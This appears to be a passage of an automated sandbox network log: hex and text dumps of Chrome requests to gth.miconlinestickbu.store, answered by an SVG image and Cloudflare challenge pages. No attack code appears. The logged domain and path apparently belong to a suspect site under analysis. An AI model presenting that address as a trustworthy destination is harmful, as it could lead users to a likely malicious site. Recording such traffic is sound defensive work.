                                    2024-05-22 15:09:27 UTC715INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                    Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                    2024-05-22 15:09:27 UTC1156INData Raw: 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74
                                    Data Ascii: 8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" st
                                    2024-05-22 15:09:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.449812104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC449OUTGET /o/617b5a702a34daddd03071650f95cbe6664e0aa557579 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:27 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16527
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:27 UTC759INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 68 78 78 72 43 69 57 63 50 72 61 6a 35 48 6c 7a 79 73 2b 55 46 4f 72 4a 55 34 48 4f 6f 54 74 68 4d 36 55 71 38 5a 49 30 35 78 47 65 75 43 4d 79 30 4e 42 42 57 6b 6d 79 63 71 30 34 74 49 38 39 47 58 38 62 73 65 54 6c 36 77 48 64 49 44 30 30 6f 46 71 77 65 58 45 6c 6a 39 4c 51 6e 34 65 4a 73 30 34 58 69 4a 4f 43 50 78 4c 47 51 6a 6b 56 61 62 47 55 4a 56 50 46 4c 64 32 63 33 70 39 70 47 6e 62 6c 54 35 43 31 33 32 72 35 31 6a 31 6a 71 52 70 71 53 67 3d 3d 24 6b 6b 51 50 6c 4c 62 63 63 42 49 52 4e 59 63 53 46 68 62 46 49 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: hxxrCiWcPraj5Hlzys+UFOrJU4HOoTthM6Uq8ZI05xGeuCMy0NBBWkmycq04tI89GX8bseTl6wHdID00oFqweXElj9LQn4eJs04XiJOCPxLGQjkVabGUJVPFLd2c3p9pGnblT5C132r51j1jqRpqSg==$kkQPlLbccBIRNYcSFhbFIA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:27 UTC699INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:27 UTC1369INData Raw: 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                                    Data Ascii: r:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url
                                    2024-05-22 15:09:27 UTC1369INData Raw: 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f
                                    Data Ascii: height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{bo
                                    2024-05-22 15:09:27 UTC1369INData Raw: 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a
                                    Data Ascii: TYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:
                                    2024-05-22 15:09:27 UTC1369INData Raw: 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74
                                    Data Ascii: 1NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:t
                                    2024-05-22 15:09:27 UTC1369INData Raw: 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79
                                    Data Ascii: uMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy
                                    2024-05-22 15:09:27 UTC1369INData Raw: 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79
                                    Data Ascii: er-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display
                                    2024-05-22 15:09:27 UTC1369INData Raw: 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c
                                    Data Ascii: screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl
                                    2024-05-22 15:09:27 UTC1369INData Raw: 79 56 31 71 54 55 6f 43 48 69 53 2e 38 2e 67 67 69 66 61 6f 39 4a 45 4f 63 75 71 4f 55 67 74 67 4b 77 63 58 67 78 45 78 7a 67 44 34 68 66 54 61 71 49 56 38 31 6a 49 37 70 54 4d 43 4c 34 6b 65 51 46 50 48 54 6d 55 41 6b 74 4f 37 52 50 70 43 34 58 6a 48 48 57 58 75 66 5f 33 43 68 6e 4b 79 45 6b 76 35 38 33 5a 56 45 49 44 6d 59 61 77 58 33 2e 45 41 4e 6c 2e 38 72 6c 61 6b 66 78 68 5a 59 71 77 68 69 61 71 64 5a 4d 5f 2e 79 31 64 54 65 50 61 37 58 45 32 68 4b 79 6c 4e 4d 43 61 53 45 4e 79 5a 4e 4c 4c 33 6a 4f 6b 75 4a 31 38 47 5a 6b 39 7a 74 4b 51 71 61 4a 46 35 4c 31 53 55 59 78 39 50 35 69 39 51 6e 4c 70 69 45 44 2e 6a 44 6d 30 72 38 72 31 62 46 6a 6b 65 7a 35 5a 4e 5a 71 68 57 36 77 58 70 38 33 30 61 48 57 6e 76 32 56 34 34 59 54 6f 65 55 4c 56 46 41 4c 6a
                                    Data Ascii: yV1qTUoCHiS.8.ggifao9JEOcuqOUgtgKwcXgxExzgD4hfTaqIV81jI7pTMCL4keQFPHTmUAktO7RPpC4XjHHWXuf_3ChnKyEkv583ZVEIDmYawX3.EANl.8rlakfxhZYqwhiaqdZM_.y1dTePa7XE2hKylNMCaSENyZNLL3jOkuJ18GZk9ztKQqaJF5L1SUYx9P5i9QnLpiED.jDm0r8r1bFjkez5ZNZqhW6wXp830aHWnv2V44YToeULVFALj


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.449813104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC419OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:27 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16294
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:27 UTC763INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4b 46 4d 79 33 65 6c 64 42 50 61 39 2f 2b 34 5a 43 33 57 6d 78 74 6e 39 46 5a 6c 46 6a 74 72 4b 6b 30 47 41 65 44 56 35 76 4d 5a 50 50 5a 61 6b 38 51 4e 72 36 51 41 42 59 4f 65 42 56 4d 50 6c 62 65 77 30 2f 67 66 72 63 48 4d 5a 76 6f 73 2b 6d 31 4e 6f 56 51 54 39 78 53 73 33 76 4e 75 6a 2f 56 39 71 30 6d 2b 6d 2f 46 32 61 41 54 79 51 59 63 39 49 2f 6b 34 4f 38 4d 33 5a 44 6b 78 66 65 42 61 58 59 54 56 58 70 42 5a 33 4e 45 78 7a 49 7a 67 66 78 41 3d 3d 24 42 48 31 41 65 53 67 44 4d 49 4e 67 65 39 45 34 4d 79 67 49 74 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: KFMy3eldBPa9/+4ZC3Wmxtn9FZlFjtrKk0GAeDV5vMZPPZak8QNr6QABYOeBVMPlbew0/gfrcHMZvos+m1NoVQT9xSs3vNuj/V9q0m+m/F2aATyQYc9I/k4O8M3ZDkxfeBaXYTVXpBZ3NExzIzgfxA==$BH1AeSgDMINge9E4MygItQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:27 UTC695INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:27 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65
                                    Data Ascii: color:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image
                                    2024-05-22 15:09:27 UTC1369INData Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 